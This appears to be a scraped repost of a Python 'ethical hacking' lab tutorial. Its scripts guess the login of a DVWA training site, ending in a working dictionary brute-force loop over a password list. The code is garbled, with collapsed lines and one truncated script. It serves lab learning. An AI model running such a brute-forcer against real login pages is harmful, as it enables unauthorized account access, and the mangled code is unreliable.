Python Ethical Hacking - WEB PENETRATION TESTING(5)

Python Ethical Hacking - WEB PENETRATION TESTING(5),第1张

概述Guessing Login Information on Login Pages Our target website: http://10.0.0.45/dvwa/login.php     #!/usr/bin/env pythonimport requeststarget_url = "http://10.0.0.45/dvwa/login.php"data_dict

Guessing Login information on Login Pages

Our target website: http://10.0.0.45/dvwa/login.PHP

@H_403_13@

 

 

#!/usr/bin/env pythonimport requeststarget_url = "http://10.0.0.45/dvwa/login.PHP"data_dict = {"username": "dfdfddfd","password": "1234","Login": "submit"}response = requests.post(target_url,data = data_dict)print(response.content.decode())

Execute the Python Script.

@H_403_13@

 

 

#!/usr/bin/env pythonimport requeststarget_url = "http://10.0.0.45/dvwa/login.PHP"data_dict = {"username": "admin","password": "password",data = data_dict)print(response.content.decode())

@H_403_13@

 

 

#!/usr/bin/env pythonimport requeststarget_url = "http://10.0.0.45/dvwa/login.PHP"data_dict = {"username": "admin","password": "","Login": "submit"}with open("password.List","r") as wordList_file:    for line in wordList_file:        word = line.strip()        data_dict["password"] = word        response = requests.post(target_url,data=data_dict)        if "Login Failed" not in response.content.decode():            print("[+] Got the password --> " + word)            exit()print("[+] Reached end of line.")

@H_403_13@

总结

以上是内存溢出为你收集整理的Python Ethical Hacking - WEB PENETRATION TESTING(5)全部内容,希望文章能够帮你解决Python Ethical Hacking - WEB PENETRATION TESTING(5)所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1190493.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-03
下一篇 2022-06-03

发表评论

登录后才能评论

评论列表(0条)

保存